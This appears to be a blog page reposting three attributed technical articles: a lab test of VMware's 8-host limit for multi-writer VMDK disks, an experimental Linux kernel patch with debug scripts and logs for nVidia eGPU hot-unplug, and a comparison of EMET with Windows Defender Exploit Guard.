VMware virtual disk (VMDK) in Multi Write Mode

( original text by David Pasek )

VMFS is a clustered file system that disables (by default) multiple virtual machines from opening and writing to the same virtual disk (vmdk file). This prevents more than one virtual machine from inadvertently accessing the same vmdk file. This is the safety mechanism to avoid data corruption in cases where the applications in the virtual machine do not maintain consistency in the writes performed to the shared disk. However, you might have some third-party cluster-aware application, where the multi-writer option allows VMFS-backed disks to be shared by multiple virtual machines and leverage third-party OS/App cluster solutions to share a single VMDK disk on VMFS filesystem. These third-party cluster-aware applications, in which the applications ensure that writes originate from multiple different virtual machines, does not cause data loss. Examples of such third-party cluster-aware applications are Oracle RAC, Veritas Cluster Filesystem, etc.Картинки по запросу VMware

There is VMware KB “Enabling or disabling simultaneous write protection provided by VMFS using the multi-writer flag (1034165)” available at https://kb.vmware.com/kb/1034165 KB describes how to enable or disable simultaneous write protection provided by VMFS using the multi-writer flag. It is the official resource how to use multi-write flag but the operational procedure is a little bit obsolete as vSphere 6.x supports configuration from WebClient (Flash) or vSphere Client (HTML5) GUI as highlighted in the screenshot below.

However, KB 1034165 contains several important limitations which should be considered and addressed in solution design. Limitations of multi-writer mode are:

  • The virtual disk must be eager zeroed thick; it cannot be zeroed thick or thin provisioned.
  • Sharing is limited to 8 ESXi/ESX hosts with VMFS-3 (vSphere 4.x) and VMFS-5 (vSphere 5.x) and VMFS-6 in multi-writer mode.
  • Hot adding a virtual disk removes Multi-Writer Flag.

Let’s focus on 8 ESXi host limit. The above statement about scalability is a little bit unclear. That’s the reason why one of my customers has asked me what does it really mean. I did some research on internal VMware resources and fortunately enough I’ve found internal VMware discussion about this topic, so I think sharing the info about this topic will help to broader VMware community.

Here is 8 host limit explanation in other words …

“8 host limit implies how many ESXi hosts can simultaneously open the same virtual disk (aka VMDK file). If the cluster-aware application is not going to have more than 8 nodes, it works and it is supported. This limitation applies to a group of VMs sharing the same VMDK file for a particular instance of the cluster-aware application. In case, you need to consolidate multiple application clusters into a single vSphere cluster, you can safely do it and app nodes from one app cluster instance can run on other ESXi nodes than app nodes from another app cluster instance. It means that if you have more than one app cluster instance, all app cluster instances can leverage resources from more than 8 ESXi hosts in vSphere Cluster.”

The best way to fully understand specific behavior is to test it. That’s why I have a pretty decent home lab. However, I do not have 10 physical ESXi host, therefore I have created a nested vSphere environment with vSphere Cluster having 9 ESXi hosts. You can see vSphere cluster with two App Cluster Instances (App1, App2) on the screenshot below.

Application Cluster instance App1 is composed of 9 nodes (9 VMs) and App2 instance just from 2 nodes. Each instance is sharing their own VMDK disk. The whole test infrastructure is conceptually depicted on the figures below.

Test Step 1: I have started 8 of 9 VMs of App1 cluster instance on 8 ESXi hosts (ESXi01-ESXi08). Such setup works perfectly fine as there is 1 to 1 mapping between VMs and ESX hosts within the limit of 8 ESXi hosts having shared VMDK1 opened.

Test Step 2: Next step is to test the Power-On operation of App1-VM9 on ESXi09. Such operation fails. This is expected result because 9th ESXi host cannot open the VMDK1 file on VMFS datastore.

The error message is visible on the screenshot below.

Test Step 3: Next step is to Power On App1-VM9 on ESXi01. This operation is successful as two app cluster nodes (virtual machines App1-VM1 and App1-VM9) are running on single ESXi host (ESX01) therefore only 8 ESXi hosts have the VMDK1 file open and we are in the supported limits.

Test Step 4: Let’s test vMotion of App1-VM9 from ESXi01 to ESX09. Such operation fails. This is expected result because of the same reason as on Power-On operation. App1 Cluster instance would be stretched across 9 ESXi hosts but 9thESXi host cannot open VMDK1 file on VMFS datastore.

The error message is a little bit different but the root cause is the same.

Test Step 5: Let’s test vMotion of App2-VM2 from ESXi08 to ESX09. Such operation works because App2 Cluster instance is still stretched across two ESXi hosts only so it is within supported 8 ESXi hosts limit.

Test step 6: The last test is the vMotion of App2-VM2 from vSphere Cluster (ESXi08) to standalone ESXi host outside of the vSphere cluster (ESX01). Such operation works because App2 Cluster instance is still stretched across two ESXi hosts only so it is within supported 8 ESXi hosts limit. vSphere cluster is not the boundary for multi-write VMDK mode.

FAQ

Q: What exactly does it mean the limitation of 8 ESXi hosts?

A: 8 ESXi host limit implies how many ESXi hosts can simultaneously open the same virtual disk (aka VMDK file). If the cluster-aware application is not going to have more than 8 nodes, it works and it is supported. Details and various scenarios are described in this article.

Q: Where are stored the information about the locks from ESXi hosts?

A: The normal VMFS file locking mechanism is in use, therefore there are VMFS file locks which can be displayed by ESXi command: vmkfstools -D

The only difference is that multi-write VMDKs can have multiple locks as is shown in the screenshot below.

Q: Is it supported to use DRS rules for vmdk multi-write in case that is more than 8 ESXi hosts in the cluster where VMs with configured multi-write vmdks are running?

A: Yes. It is supported. DRS rules can be beneficial to keep all nodes of the particular App Cluster Instance on specified ESXi hosts. This is not necessary nor required from the technical point of view, but it can be beneficial from a licensing point of view.

Q: How ESXi life cycle can be handled with the limit 8 ESXi hosts?

A: Let’s discuss specific VM operations and supportability of multi-write vmdk configuration. The source for the answers is VMware KB https://kb.vmware.com/kb/1034165

  • Power on, off, restart virtual machine – supported
  • Suspend VM – unsupported
  • Hot add virtual disks — only to existing adapters
  • Hot remove devices – supported
  • Hot extend virtual disk – unsupported
  • Connect and disconnect devices – supported
  • Snapshots – unsupported
  • Snapshots of VMs with independent-persistent disks – supported
  • Cloning – unsupported
  • Storage vMotion – unsupported
  • Changed Block Tracking (CBT) – unsupported
  • vSphere Flash Read Cache (vFRC) – unsupported
  • vMotion – supported by VMware for Oracle RAC only and limited to 8 ESX/ESXi hosts. Note: other cluster-aware applications are not supported by VMware but can be supported by partners. For example, Veritas products have supportability documented here https://sort.veritas.com/public/documents/sfha/6.2/vmwareesx/productguides/html/sfhas_virtualization/ch01s05s01.htm Please, verify current supportability directly with specific partners.

Q: Is it possible to migrate VMs with multi-write vmdks to different cluster when it will be offline?

A: Yes. VM can be Shut Down or Power Off and Power On on any ESXi host outside of the vSphere cluster. The only requirement is to have the same VMFS datastore available on source and target ESXi host. Please, keep in mind that the maximum supported number of ESXi hosts connected to a single VMFS datastore is 64.

 

Patching nVidia GPU driver for hot-unplug on Linux

( original text by @whitequark )

Recently, I’ve using an extremely cursed setup where my XPS 13 9360 laptop is connected to a Sonnet EchoExpress 2 box rewired for Thunderbolt 3 that has an nVidia Quadro 600 GPU, and Linux is set up for render offload to the eGPU and then frame transfer back to iGPU to be displayed on the laptop’s integrated display, which (to my sheer surprise) not only works quire reliably, but even gives me higher FPS in Team Fortress 2 than the iGPU.Картинки по запросу nvidiaThere’s only really one downside: if the eGPU falls off the bus, either because someone™ pulled out the cable, or because the stars didn’t align quite right this morning and it decided to enumerate seemingly at random (sometimes this is preceeded by whining from PCIe AER, sometimes not, I think it’s some sort of hardware issue like a badly inserted PCIe card, but I’m not entirely sure), the nVidia driver… hangs. Hangs quite deliberately, as the sources to the kernel driver show. This leaves the Xorg instance bound to the eGPU hung forever (which confuses bumblebee, but is otherwise not especially bad), and also prevents any new ones from using the eGPU (which is bad).

Anyway, I was kind of annoyed of rebooting every time it happens, so I decided to reboot a few more dozen times instead while patching the driver. This has indeed worked, and left me with something similar to a functional hot-unplug, mildly crippled by the fact that nvidia-modeset is a completely opaque blob that keeps some internal state and tries to act on it, getting stuck when it tries to do something to the now-missing eGPU.

Turns out, there are only a few issues preventing functional hot-unplug.

  1. In 
    nvidia_remove

    , the driver actually checks if anyone’s still trying to use it, and if yes, it tries to just hang the removal process. This doesn’t actually work, or rather, it mostly works by accident. It starts an infinite loop calling 

    os_schedule()

     while having taken the 

    NV_LINUX_DEVICES

     lock. While in the default configuration this indeed hangs any reentrant requests into the driver by virtue of 

    NV_CHECK_PCI_CONFIG_SPACE

     taking the same lock (in 

    verify_pci_bars

    , passing the 

    NVreg_CheckPCIConfigSpace=0

     module option eliminates that accidental safety mechanism, and allows reentrant requests to proceed. They do not crash due to memory being deallocated in 

    nvidia_remove

     (so you don’t get an unhandled kernel page fault), but they still crash due to being unable to access the GPU.

  2. The NVKMS component (in the 
    nvidia-modeset

     module) tries to maintain some state, and change it when e.g. the Xorg instance quits and closes the 

    /dev/nvidia-modeset

     file. Unfortunately, it does not expect the GPU to go away, and first spews a few messages to 

    dmesg

     similar to 

    nvidia-modeset: ERROR: GPU:0: Failed to query display engine channel state: 0x0000857d:0:0:0x0000000f

    , after which it appears to hang somewhere inside the blob, which has been conveniently stripped of all symbols. This needs to be prevented, but…

  3. The NVKMS component effectively only exposes a single opaque ioctl, and all the communication, including communication of the GPU bus ID, happens out of band with regards to the open source parts of the 
    nvidia-modeset

    module. Fortunately, NVKMS calls back into NVRM, and this allows us to associate each 

    /dev/nvidia-modeset

     fd with the GPU bus ID.

  4. When unloading NVKMS, it also tries to act on its internal state and change the GPU state, which leads to the same hang.

All in all, this allows a patch to be written that detects when a GPU goes away, ignores all further NVKMS requests related to that specific GPU (and returns 

-ENOENT

 in response to ioctls, which Xorg appropriately interprets as a fault condition), correctly releases the resources by requesting NVRM, and improperly unloads NVKMS so it doesn’t try to reset the GPU state. (All actual resources should be released by this point, and NVKMS doesn’t have any resource allocation callbacks other than those we already intercept, so in theory this doesn’t have any bad consequences. But I’m not working for nVidia, so this might be completely wrong.)

After the GPU is plugged back in, NVKMS will try to act on its internal state again; in this case, it doesn’t hang, but it doesn’t initialize the GPU correctly either, so the 

nvidia-modeset

 kernel module has to be (manually) reloaded. It’s not easy to do this automatically because in a hypothetical system with more than one nVidia GPU the module would still be in use when one of them dies, and so just hard reloading NVKMS would have unfortunate consequences. (Though, I don’t really know whether NVKMS would try to access the dead GPU in response to the request acting on the other GPU anyway. I decided to do it conservatively.) Once it’s reloaded you’re back in the game though!

Here’s the patch, written against the 

nvidia-legacy-390xx-390.87

 Debian source package:

nvidia-hot-gpu-on-gpu-unplug-action.patch (download)

 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
diff -ur original/common/inc/nv-linux.h patchedl/common/inc/nv-linux.h
--- original/common/inc/nv-linux.h	2018-09-23 12:20:02.000000000 +0000
+++ patched/common/inc/nv-linux.h	2018-10-28 07:19:21.526566940 +0000
@@ -1465,6 +1465,7 @@
 typedef struct nv_linux_state_s {
     nv_state_t nv_state;
     atomic_t usage_count;
+    atomic_t dead;
 
     struct pci_dev *dev;
 
diff -ur original/common/inc/nv-modeset-interface.h patched/common/inc/nv-modeset-interface.h
--- original/common/inc/nv-modeset-interface.h	2018-08-22 00:55:23.000000000 +0000
+++ patched/common/inc/nv-modeset-interface.h	2018-10-28 07:22:00.768238371 +0000
@@ -25,6 +25,8 @@
 
 #include "nv-gpu-info.h"
 
+#include <asm/atomic.h>
+
 /*
  * nvidia_modeset_rm_ops_t::op gets assigned a function pointer from
  * core RM, which uses the calling convention of arguments on the
@@ -115,6 +117,8 @@
 
     int (*set_callbacks)(const nvidia_modeset_callbacks_t *cb);
 
+    atomic_t * (*gpu_dead)(NvU32 gpu_id);
+
 } nvidia_modeset_rm_ops_t;
 
 NV_STATUS nvidia_get_rm_ops(nvidia_modeset_rm_ops_t *rm_ops);
diff -ur original/common/inc/nv-proto.h patched/common/inc/nv-proto.h
--- original/common/inc/nv-proto.h	2018-08-22 00:55:23.000000000 +0000
+++ patched/common/inc/nv-proto.h	2018-10-28 07:20:49.939494812 +0000
@@ -81,6 +81,7 @@
 NvBool      nvidia_get_gpuid_list       (NvU32 *gpu_ids, NvU32 *gpu_count);
 int         nvidia_dev_get              (NvU32, nvidia_stack_t *);
 void        nvidia_dev_put              (NvU32, nvidia_stack_t *);
+atomic_t *  nvidia_dev_dead             (NvU32);
 int         nvidia_dev_get_uuid         (const NvU8 *, nvidia_stack_t *);
 void        nvidia_dev_put_uuid         (const NvU8 *, nvidia_stack_t *);
 int         nvidia_dev_get_pci_info     (const NvU8 *, struct pci_dev **, NvU64 *, NvU64 *);
diff -ur original/nvidia/nv.c patched/nvidia/nv.c
--- original/nvidia/nv.c	2018-09-23 12:20:02.000000000 +0000
+++ patched/nvidia/nv.c	2018-10-28 07:48:05.895025112 +0000
@@ -1944,6 +1944,12 @@
     unsigned int i;
     NvBool bRemove = NV_FALSE;
 
+    if (NV_ATOMIC_READ(nvl->dead))
+    {
+        nv_printf(NV_DBG_ERRORS, "NVRM: nvidia_close called on dead device by pid %d!\n",
+                  current->pid);
+    }
+
     NV_CHECK_PCI_CONFIG_SPACE(sp, nv, TRUE, TRUE, NV_MAY_SLEEP());
 
     /* for control device, just jump to its open routine */
@@ -2106,6 +2112,12 @@
     size_t arg_size;
     int arg_cmd;
 
+    if (NV_ATOMIC_READ(nvl->dead))
+    {
+        nv_printf(NV_DBG_ERRORS, "NVRM: nvidia_ioctl called on dead device by pid %d!\n",
+                  current->pid);
+    }
+
     nv_printf(NV_DBG_INFO, "NVRM: ioctl(0x%x, 0x%x, 0x%x)\n",
         _IOC_NR(cmd), (unsigned int) i_arg, _IOC_SIZE(cmd));
 
@@ -3217,6 +3229,7 @@
     NV_INIT_MUTEX(&nvl->ldata_lock);
 
     NV_ATOMIC_SET(nvl->usage_count, 0);
+    NV_ATOMIC_SET(nvl->dead, 0);
 
     if (!rm_init_event_locks(sp, nv))
         return NV_FALSE;
@@ -4018,14 +4031,38 @@
         nv_printf(NV_DBG_ERRORS,
                   "NVRM: Attempting to remove minor device %u with non-zero usage count!\n",
                   nvl->minor_num);
+        nv_printf(NV_DBG_ERRORS,
+                  "NVRM: YOLO, waiting for usage count to drop to zero\n");
         WARN_ON(1);
 
-        /* We can't continue without corrupting state, so just hang to give the
-         * user some chance to do something about this before reboot */
-        while (1)
+        NV_ATOMIC_SET(nvl->dead, 1);
+
+        /* Insanity check: wait until all clients die, then hope for the best. */
+        while (1) {
+            UNLOCK_NV_LINUX_DEVICES();
             os_schedule();
-    }
+            LOCK_NV_LINUX_DEVICES();
+
+            nvl = pci_get_drvdata(dev);
+            if (!nvl || (nvl->dev != dev))
+            {
+                goto done;
+            }
+
+            if (NV_ATOMIC_READ(nvl->usage_count) == 0)
+            {
+                break;
+            }
+        }
 
+        nv_printf(NV_DBG_ERRORS,
+                  "NVRM: Usage count is now zero, proceeding to remove the GPU\n");
+        nv_printf(NV_DBG_ERRORS,
+                  "NVRM: This is not actually supposed to work lol. Hope it does tho ????\n");
+        nv_printf(NV_DBG_ERRORS,
+                  "NVRM: You probably want to reload nvidia-modeset now if you want any "
+                  "of this to ever start up again, but like, man, that's your choice entirely\n");
+    }
     nv = NV_STATE_PTR(nvl);
     if (nvl == nv_linux_devices)
         nv_linux_devices = nvl->next;
@@ -4712,6 +4749,22 @@
     up(&nvl->ldata_lock);
 }
 
+atomic_t *nvidia_dev_dead(NvU32 gpu_id)
+{
+    nv_linux_state_t *nvl;
+    atomic_t *ret;
+
+    /* Takes nvl->ldata_lock */
+    nvl = find_gpu_id(gpu_id);
+    if (!nvl)
+        return NV_FALSE;
+
+    ret = &nvl->dead;
+    up(&nvl->ldata_lock);
+
+    return ret;
+}
+
 /*
  * Like nvidia_dev_get but uses UUID instead of gpu_id. Note that this may
  * trigger initialization and teardown of unrelated devices to look up their
diff -ur original/nvidia/nv-modeset-interface.c patched/nvidia/nv-modeset-interface.c
--- original/nvidia/nv-modeset-interface.c	2018-08-22 00:55:22.000000000 +0000
+++ patched/nvidia/nv-modeset-interface.c	2018-10-28 07:20:25.959243110 +0000
@@ -114,6 +114,7 @@
         .close_gpu      = nvidia_dev_put,
         .op             = rm_kernel_rmapi_op, /* provided by nv-kernel.o */
         .set_callbacks  = nvidia_modeset_set_callbacks,
+        .gpu_dead       = nvidia_dev_dead,
     };
 
     if (strcmp(rm_ops->version_string, NV_VERSION_STRING) != 0)
diff -ur original/nvidia/nv-reg.h patched/nvidia/nv-reg.h
diff -ur original/nvidia-modeset/nvidia-modeset-linux.c patched/nvidia-modeset/nvidia-modeset-linux.c
--- original/nvidia-modeset/nvidia-modeset-linux.c	2018-09-23 12:20:02.000000000 +0000
+++ patched/nvidia-modeset/nvidia-modeset-linux.c	2018-10-28 07:47:14.738703417 +0000
@@ -75,6 +75,9 @@
 
 static struct semaphore nvkms_lock;
 
+static NvU32 clopen_gpu_id;
+static NvBool leak_on_unload;
+
 /*************************************************************************
  * NVKMS executes queued work items on a single kthread.
  *************************************************************************/
@@ -89,6 +92,9 @@
 struct nvkms_per_open {
     void *data;
 
+    NvU32 gpu_id;
+    atomic_t *gpu_dead;
+
     enum NvKmsClientType type;
 
     union {
@@ -711,6 +717,9 @@
     nvidia_modeset_stack_ptr stack = NULL;
     NvBool ret;
 
+    printk(KERN_INFO NVKMS_LOG_PREFIX "nvkms_open_gpu called with %08x, pid %d\n",
+           gpuId, current->pid);
+
     if (__rm_ops.alloc_stack(&stack) != 0) {
         return NV_FALSE;
     }
@@ -719,6 +728,10 @@
 
     __rm_ops.free_stack(stack);
 
+    if (ret) {
+        clopen_gpu_id = gpuId;
+    }
+
     return ret;
 }
 
@@ -726,12 +739,17 @@
 {
     nvidia_modeset_stack_ptr stack = NULL;
 
+    printk(KERN_INFO NVKMS_LOG_PREFIX "nvkms_close_gpu called with %08x, pid %d\n",
+           gpuId, current->pid);
+
     if (__rm_ops.alloc_stack(&stack) != 0) {
         return;
     }
 
     __rm_ops.close_gpu(gpuId, stack);
 
+    clopen_gpu_id = gpuId;
+
     __rm_ops.free_stack(stack);
 }
 
@@ -771,8 +789,14 @@
 
     popen->type = type;
 
+    printk(KERN_INFO NVKMS_LOG_PREFIX "entering nvkms_open_common, pid %d\n",
+           current->pid);
+
     *status = down_interruptible(&nvkms_lock);
 
+    printk(KERN_INFO NVKMS_LOG_PREFIX "taken lock in nvkms_open_common, pid %d\n",
+           current->pid);
+
     if (*status != 0) {
         goto failed;
     }
@@ -781,6 +805,9 @@
 
     up(&nvkms_lock);
 
+    printk(KERN_INFO NVKMS_LOG_PREFIX "given up lock in nvkms_open_common, pid %d\n",
+           current->pid);
+
     if (popen->data == NULL) {
         *status = -EPERM;
         goto failed;
@@ -799,10 +826,16 @@
 
     *status = 0;
 
+    printk(KERN_INFO NVKMS_LOG_PREFIX "exiting in nvkms_open_common, pid %d\n",
+           current->pid);
+
     return popen;
 
 failed:
 
+    printk(KERN_INFO NVKMS_LOG_PREFIX "error in nvkms_open_common, pid %d\n",
+           current->pid);
+
     nvkms_free(popen, sizeof(*popen));
 
     return NULL;
@@ -816,14 +849,36 @@
      * mutex.
      */
 
+    printk(KERN_INFO NVKMS_LOG_PREFIX "entering nvkms_close_common, pid %d\n",
+           current->pid);
+
     down(&nvkms_lock);
 
-    nvKmsClose(popen->data);
+    printk(KERN_INFO NVKMS_LOG_PREFIX "taken lock in nvkms_close_common, pid %d\n",
+           current->pid);
+
+    if (popen->gpu_id != 0 && atomic_read(popen->gpu_dead) != 0) {
+        printk(KERN_ERR NVKMS_LOG_PREFIX "awwww u need cleanup :3 "
+               "in nvkms_close_common, pid %d\n",
+               current->pid);
+
+        nvkms_close_gpu(popen->gpu_id);
+
+        popen->gpu_id = 0;
+        popen->gpu_dead = NULL;
+
+        leak_on_unload = NV_TRUE;
+    } else {
+        nvKmsClose(popen->data);
+    }
 
     popen->data = NULL;
 
     up(&nvkms_lock);
 
+    printk(KERN_INFO NVKMS_LOG_PREFIX "given up lock in nvkms_close_common, pid %d\n",
+           current->pid);
+
     if (popen->type == NVKMS_CLIENT_KERNEL_SPACE) {
         /*
          * Flush any outstanding nvkms_kapi_event_kthread_q_callback() work
@@ -844,6 +899,9 @@
     }
 
     nvkms_free(popen, sizeof(*popen));
+
+    printk(KERN_INFO NVKMS_LOG_PREFIX "exiting nvkms_close_common, pid %d\n",
+           current->pid);
 }
 
 int NVKMS_API_CALL nvkms_ioctl_common
@@ -855,20 +913,58 @@
     int status;
     NvBool ret;
 
+    printk(KERN_INFO NVKMS_LOG_PREFIX "entering nvkms_ioctl_common, pid %d\n",
+           current->pid);
+
     status = down_interruptible(&nvkms_lock);
     if (status != 0) {
         return status;
     }
 
+    printk(KERN_INFO NVKMS_LOG_PREFIX "taken lock in nvkms_ioctl_common, pid %d\n",
+           current->pid);
+
+    if (popen->gpu_id != 0 && atomic_read(popen->gpu_dead) != 0) {
+        goto dead;
+    }
+
+    clopen_gpu_id = 0;
+
     if (popen->data != NULL) {
         ret = nvKmsIoctl(popen->data, cmd, address, size);
     } else {
         ret = NV_FALSE;
     }
 
+    if (clopen_gpu_id != 0) {
+        if (!popen->gpu_id) {
+            printk(KERN_INFO NVKMS_LOG_PREFIX "detected gpu %08x open in nvkms_ioctl_common, "
+                   "pid %d\n", clopen_gpu_id, current->pid);
+            popen->gpu_id = clopen_gpu_id;
+            popen->gpu_dead = __rm_ops.gpu_dead(clopen_gpu_id);
+        } else {
+            printk(KERN_INFO NVKMS_LOG_PREFIX "detected gpu %08x close in nvkms_ioctl_common, "
+                   "pid %d\n", clopen_gpu_id, current->pid);
+            popen->gpu_id = 0;
+            popen->gpu_dead = NULL;
+        }
+    }
+
     up(&nvkms_lock);
 
+    printk(KERN_INFO NVKMS_LOG_PREFIX "given up lock in nvkms_ioctl_common, pid %d\n",
+           current->pid);
+
     return ret ? 0 : -EPERM;
+
+dead:
+    up(&nvkms_lock);
+
+    printk(KERN_ERR NVKMS_LOG_PREFIX "*notices ur gpu is dead* owo whats this "
+           "in nvkms_ioctl_common, pid %d\n",
+           current->pid);
+
+    return -ENOENT;
 }
 
 /*************************************************************************
@@ -1239,9 +1335,14 @@
 
     nvkms_proc_exit();
 
-    down(&nvkms_lock);
-    nvKmsModuleUnload();
-    up(&nvkms_lock);
+    if(leak_on_unload) {
+        printk(KERN_ERR NVKMS_LOG_PREFIX "im just gonna leak all the kms junk ok? "
+               "haha nvm wasnt a question. in nvkms_exit\n");
+    } else {
+        down(&nvkms_lock);
+        nvKmsModuleUnload();
+        up(&nvkms_lock);
+    }
 
     /*
      * At this point, any pending tasks should be marked canceled, but

 

Here’s some handy scripts I was using while debugging it:

insmod.sh

 
1
2
3
4
5
#!/bin/sh -ex
modprobe acpi_ipmi
insmod nvidia.ko NVreg_ResmanDebugLevel=-1 NVreg_CheckPCIConfigSpace=0
insmod nvidia-modeset.ko
dmesg -w

 
rmmod.sh

 
1
2
3
#!/bin/sh
rmmod nvidia-modeset
rmmod nvidia

 
xorg.sh

 
1
2
#!/bin/sh
exec Xorg :8 -config /etc/bumblebee/xorg.conf.nvidia -configdir /etc/bumblebee/xorg.conf.d -sharevts -nolisten tcp -noreset -verbose 3 -isolateDevice PCI:06:00:0 -modulepath /usr/lib/nvidia/nvidia,/usr/lib/xorg/modules

 

And finally, here are the relevant kernel and Xorg log messages, showing what happens when a GPU is unplugged:

dmesg.log

 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
[  219.524218] NVRM: loading NVIDIA UNIX x86_64 Kernel Module  390.87  Tue Aug 21 12:33:05 PDT 2018 (using threaded interrupts)
[  219.527409] nvidia-modeset: Loading NVIDIA Kernel Mode Setting Driver for UNIX platforms  390.87  Tue Aug 21 16:16:14 PDT 2018
[  224.780721] nvidia-modeset: nvkms_open_gpu called with 00000600, pid 4560
[  224.807370] nvidia-modeset: detected gpu 00000600 open in nvkms_ioctl_common, pid 4560
[  239.061383] NVRM: GPU at PCI:0000:06:00: GPU-9fe1319c-8dd3-44e4-2b74-de93f8b02c6a
[  239.061387] NVRM: Xid (PCI:0000:06:00): 79, GPU has fallen off the bus.
[  239.061389] NVRM: GPU at 0000:06:00.0 has fallen off the bus.
[  239.061398] NVRM: A GPU crash dump has been created. If possible, please run
               NVRM: nvidia-bug-report.sh as root to collect this data before
               NVRM: the NVIDIA kernel module is unloaded.
[  240.209498] NVRM: Attempting to remove minor device 0 with non-zero usage count!
[  240.209501] NVRM: YOLO, waiting for usage count to drop to zero
[  241.433499] nvidia-modeset: *notices ur gpu is dead* owo whats this in nvkms_ioctl_common, pid 4560
[  241.433851] nvidia-modeset: awwww u need cleanup :3 in nvkms_close_common, pid 4560
[  241.433853] nvidia-modeset: nvkms_close_gpu called with 00000600, pid 4560
[  250.440498] NVRM: Usage count is now zero, proceeding to remove the GPU
[  250.440513] NVRM: This is not actually supposed to work lol. Hope it does tho ????
[  250.440520] NVRM: You probably want to reload nvidia-modeset now if you want any of this to ever start up again, but like, man, that's your choice entirely
[  250.440870] pci 0000:06:00.1: Dropping the link to 0000:06:00.0
[  250.440950] pci_bus 0000:06: busn_res: [bus 06] is released
[  250.440982] pci_bus 0000:07: busn_res: [bus 07-38] is released
[  250.441012] pci_bus 0000:05: busn_res: [bus 05-38] is released
[  251.000794] pci_bus 0000:02: Allocating resources
[  251.001324] pci_bus 0000:02: Allocating resources
[  253.765953] pcieport 0000:00:1c.0: AER: Corrected error received: 0000:00:1c.0
[  253.765969] pcieport 0000:00:1c.0: PCIe Bus Error: severity=Corrected, type=Physical Layer, (Receiver ID)
[  253.765976] pcieport 0000:00:1c.0:   device [8086:9d10] error status/mask=00002001/00002000
[  253.765982] pcieport 0000:00:1c.0:    [ 0] Receiver Error         (First)
[  253.841064] pcieport 0000:02:02.0: Refused to change power state, currently in D3
[  253.843882] pcieport 0000:02:00.0: Refused to change power state, currently in D3
[  253.846177] pci_bus 0000:03: busn_res: [bus 03] is released
[  253.846248] pci_bus 0000:04: busn_res: [bus 04-38] is released
[  253.846300] pci_bus 0000:39: busn_res: [bus 39] is released
[  253.846348] pci_bus 0000:02: busn_res: [bus 02-39] is released
[  353.369487] nvidia-modeset: im just gonna leak all the kms junk ok? haha nvm wasnt a question. in nvkms_exit
[  357.600350] nvidia-modeset: Loading NVIDIA Kernel Mode Setting Driver for UNIX platforms  390.87  Tue Aug 21 16:16:14 PDT 2018

 
Xorg.8.log

 
1
[   244.798] (EE) NVIDIA(GPU-0): WAIT (2, 8, 0x8000, 0x000011f4, 0x00001210)

Comparison between Enhanced Mitigation Experience Toolkit and Windows Defender Exploit Guard

Картинки по запросу Windows Defender Exploit Guard

 Important

If you are currently using EMET, you should be aware that EMET reached end of life on July 31, 2018. You should consider replacing EMET with exploit protection in Windows Defender ATP.

You can convert an existing EMET configuration file into Exploit protection to make the migration easier and keep your existing settings.

This topic describes the differences between the Enhance Mitigation Experience Toolkit (EMET) and exploit protection in Windows Defender ATP.

Exploit protection in Windows Defender ATP is our successor to EMET and provides stronger protection, more customization, an easier user interface, and better configuration and management options.

EMET is a standalone product for earlier versions of Windows and provides some mitigation against older, known exploit techniques.

Картинки по запросу EMET

After July 31, 2018, it will not be supported.

For more information about the individual features and mitigations available in Windows Defender ATP, as well as how to enable, configure, and deploy them to better protect your network, see the following topics:

Feature comparison

The table in this section illustrates the differences between EMET and Windows Defender Exploit Guard.

Windows Defender Exploit Guard EMET
Windows versions All versions of Windows 10 starting with version 1709 Windows 8.1; Windows 8; Windows 7
Cannot be installed on Windows 10, version 1709 and later
Installation requirements Windows Security in Windows 10
(no additional installation required)
Windows Defender Exploit Guard is built into Windows — it doesn’t require a separate tool or package for management, configuration, or deployment.
Available only as an additional download and must be installed onto a management device
User interface Modern interface integrated with the Windows Security app Older, complex interface that requires considerable ramp-up training
Supportability Dedicated submission-based support channel[1]
Part of the Windows 10 support lifecycle
Ends after July 31, 2018
Updates Ongoing updates and development of new features, released twice yearly as part of the Windows 10 semi-annual update channel No planned updates or development
Exploit protection All EMET mitigations plus new, specific mitigations (see table)
Can convert and import existing EMET configurations
Limited set of mitigations
Attack surface reduction[2] Helps block known infection vectors
Can configure individual rules
Limited ruleset configuration only for modules (no processes)
Network protection[2] Helps block malicious network connections Not available
Controlled folder access[2] Helps protect important folders
Configurable for apps and folders
Not available
Configuration with GUI (user interface) Use Windows Security app to customize and manage configurations Requires installation and use of EMET tool
Configuration with Group Policy Use Group Policy to deploy and manage configurations Available
Configuration with shell tools Use PowerShell to customize and manage configurations Requires use of EMET tool (EMET_CONF)
System Center Configuration Manager Use Configuration Manager to customize, deploy, and manage configurations Not available
Microsoft Intune Use Intune to customize, deploy, and manage configurations Not available
Reporting With Windows event logs and full audit mode reporting
Full integration with Windows Defender Advanced Threat Protection
Limited Windows event log monitoring
Audit mode Full audit mode with Windows event reporting Limited to EAF, EAF+, and anti-ROP mitigations

(1) Requires an enterprise subscription with Azure Active Directory or a Software Assurance ID.

